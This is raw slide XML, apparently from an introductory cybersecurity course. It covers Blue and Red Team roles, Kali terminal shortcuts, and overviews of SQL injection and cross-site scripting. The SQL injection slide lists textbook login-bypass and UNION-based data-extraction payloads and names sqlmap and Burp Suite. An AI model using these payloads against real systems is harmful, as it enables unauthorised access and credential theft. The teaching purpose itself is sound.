            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> identifying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> reacting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to, and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> reducing attacks. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In contrast to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Red Team, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>simulates attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, the Blue Team actively </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>protects against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>them as they occur.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108983660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B9F5E-D8B3-5122-4F22-DEB456DB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7.2 Blue Team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373B6-0049-CDA7-C072-CDF35128C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67" y="1192340"/>
            <a:ext cx="8060055" cy="3693319"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Core Objectives of the Blue Team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Monitor Networks and Systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Detect suspicious behavior, unusual patterns, and intrusions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Incident Response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Investigate alerts and respond to confirmed security events.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Threat Intelligence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Analyze threat reports and apply defenses proactively.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Forensics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Analyze compromised machines to understand the attack timeline and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3353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B5FB-6394-816A-C36A-D5890B83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7.2 Blue Team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C91D4-4461-C32D-4825-AA4444EFF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273" y="1885950"/>
            <a:ext cx="8060055" cy="1846659"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Security Hardening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Secure systems by applying patches, configurations, and best practices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Log Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Use tools like SIEMs to track and correlate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8073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4B8C-8A8C-F6BB-0205-594EDFAA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7.2  Blue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DCDFF-AD72-B611-2CA8-33E443AAD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972" y="1428750"/>
            <a:ext cx="8060055" cy="2954655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Key Skills Required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deep understanding of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>network protocols</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (TCP/IP, DNS, HTTP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Knowledge of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>malware behavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>attack vectors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log analysis and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>event correlation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Familiarity with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>incident response procedures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic scripting (e.g., Python, Bash) for automation and analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142590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6DB4-2737-2B6E-F76B-53302492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404C1-13D3-70C7-3312-CFFBADFD5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952FFBDF-1B63-8336-7FD6-794B6A267E05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6CC9D48-78E6-0D08-50B1-A0583161FDD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66DADD4-D3EB-72E1-6A6F-F71AD22CA84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15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89262C0-DA89-AFC6-454A-D67C9C6B7B8B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9CA7DCE1-429F-298E-A93D-7ED459239F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3AFB302A-E95F-9869-7852-A65BCC97B9EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="1026239"/>
            <a:ext cx="9173210" cy="3347085"/>
            <a:chOff x="-13716" y="1034796"/>
            <a:chExt cx="9173210" cy="334708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9556342E-368E-8E20-8720-8C8A4BBD3C56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D1B47F53-E5BD-4B1E-8F6B-2583E91E57C7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8ECC243B-A1A2-28DD-B03F-F4B7999837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3E15E59E-DC7D-9235-19D1-6008FB1F46E4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341A473C-CB62-96F3-D869-D56C80D7BEA8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BFA8F9C2-4985-9BA3-0E59-C31233DFE0D6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15</a:t>
            </a:fld>
            <a:endParaRPr spc="-20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2237A6F7-88B2-756B-A56F-DA587304ED19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7422590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1.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" spc="-10" dirty="0"/>
              <a:t>Important abbreviations in Kali Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" spc="-10" dirty="0"/>
              <a:t>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D39C32F1-7C3C-576B-7D20-8B04CC403F5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467583" y="1915698"/>
            <a:ext cx="29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- Ctrl + A  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EC26AA-0307-1E02-DD91-76A31551FFD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589007" y="2079409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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C7C7F44-C119-FE3C-4DCD-4A67CFFB4CB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4513362" y="1876878"/>
            <a:ext cx="369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to the beginning of the line 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003A9E9E-7C36-4D26-D87B-5A1F86AFC5AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599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Ctrl + E     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B64EF2-F0CE-9A52-A415-922DA49801A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2094190" y="2511361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52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1F5BB02-EAEC-AE96-B610-C0E3AF901B53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4139996" y="2313214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to the end of the line </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A21763-74F7-8F24-6A45-BDF4EE5B6C5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="2724150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 Ctrl + U   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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3749C3-34DA-0478-3378-3BC8472AE0DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2612097" y="2926327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 Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C43FE303-EBBD-ABC1-0167-F0F1C8F7DC54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4137254" y="2749550"/>
            <a:ext cx="346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 line from start to cursor </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7305A4B6-CCDA-D6E2-BB8A-CEF8815797D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="3184323"/>
            <a:ext cx="331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 Ctrl + K</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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CC7770D5-0FC6-D7C7-46D1-0C4C40C188BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3501583" y="3221338"/>
            <a:ext cx="503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 lines from the cursor to the end of the line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41C639-83C9-A6FA-22B9-58DC2C3159DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2090404" y="338853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0B2B9B-1A14-8CB5-11AB-296AB0CC7147}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2090404" y="3816472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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B00401A3-634C-8360-1E69-8CC7FF87EEA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3603453"/>
            <a:ext cx="30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- Ctrl + W   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{978158F6-A040-C69A-26E2-30649A91E593}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3467255" y="3631806"/>
            <a:ext cx="503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Delete the last word before the cursor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296058883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5C4AB-968B-7ED8-3A6A-5597CCD1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7.3  Red Team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652D5-BB1F-A98B-02EB-1BC43F004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74" y="1352550"/>
            <a:ext cx="8060055" cy="295465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Red Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a group of cybersecurity professionals who simulate attacks on systems and networks to test an organization's security posture. Their goal is to identify weaknesses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> malicious hackers do.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Red Teaming involves </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ethical hacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>penetration testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>adversary emulation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> using tactics, techniques, and procedures (TTPs) similar to real attackers.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8894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D543-CF3D-CC92-6161-32C0BEC3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7.3 Red Team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6A197-9428-A51B-31B1-ADCA643C4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67" y="1192340"/>
            <a:ext cx="8060055" cy="4062651"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Core Objectives of the Red Team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Assess Security Defenses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Find gaps in firewalls, configurations, and access controls.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Exploit Vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Use known or zero-day exploits to gain unauthorized access.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Privilege Escalation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Move from basic access to administrative control.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0860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D9E1-6B91-A619-A58D-6C58E6F9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7.3 Red Team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7F210-7D3F-1B50-2ADC-C7B6C0B3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67" y="1192340"/>
            <a:ext cx="8060055" cy="2954655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lateral Movement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Traverse internal systems once inside the network.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Persistence </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Maintain access without being detected.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Report Findings </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Document weaknesses and recommend remediations.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14170918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18A5-FA90-63E1-9836-422D0957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7.3  Red Team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3A26C-DAC6-2F9D-E335-6DD17E639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276" y="1504950"/>
            <a:ext cx="8060055" cy="2954655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Key Skills Required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strong knowledge of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>networking and protocols</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proficiency in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Linux and Windows environments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understanding of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>common vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (OWASP Top 10, CVEs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripting and automation with Python, Bash, or PowerShell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Report writing and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>communication skills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8793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8FE9-534F-5EAE-AFCF-BBD6B6AE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ar-JO" dirty="0"/>
              <a:t>7.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SQL injection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549D8-38FF-54D6-3DD9-F0F6A095E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67" y="1192340"/>
            <a:ext cx="8060055" cy="3693319"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>web-based attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>technique that allows attackers to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>interfere </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> an application makes to its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. By injecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into input fields, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>attackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> login authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Extract</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sensitive data (usernames, passwords, credit cards)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Modify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> database contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Escalate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>privileges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48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E3C5-5AFC-F294-066B-9F32A569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7.4 SQL injection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1A68730-EBD6-857F-9B98-127CB6FA8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8278" y="1809750"/>
            <a:ext cx="81820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Common SQL Injection Examples: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' OR '1'='1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Always-true condition to bypass login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admin'--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Comment out the rest of a SQL query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' UNION SELECT null, username, password FROM users--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Extract data using UNION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5051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EDF44-AC4C-64DF-2CAC-2D6C73DE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7.4  SQL injection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B82C4-7C4C-CFEE-E97E-ED6BA0808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67" y="1192340"/>
            <a:ext cx="8060055" cy="1846659"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Tools for Testing SQL Injection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Automated SQL injection tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Intercept and test requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Manual Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Through browser or proxy with payloads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1588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04F9-48D7-8584-0CFB-2636948A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ar-JO" dirty="0"/>
              <a:t>7.5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> XSS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A2D9A-74DA-D50C-2686-0341AAE3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67" y="1192340"/>
            <a:ext cx="8060055" cy="2954655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>web vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that allows attackers to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>inject malicious scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into trusted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>websites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, which are then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>executed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> by users’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>browsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be used to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Steal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> session cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> users to malicious sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Deface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> webpages or perform phishing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0701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293C-601E-0C9A-2A73-6DD609AD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7.5  XSS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68B9D-24F4-1E42-409B-A1D05DC53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67" y="1192340"/>
            <a:ext cx="8060055" cy="2954655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Types of XSS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Script is permanently stored on the server (e.g., in a comment section)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Reflected XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Script is reflected off the server in error messages or search results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>DOM-Based XSS</a:t>
            </a:r>
            <a:r>
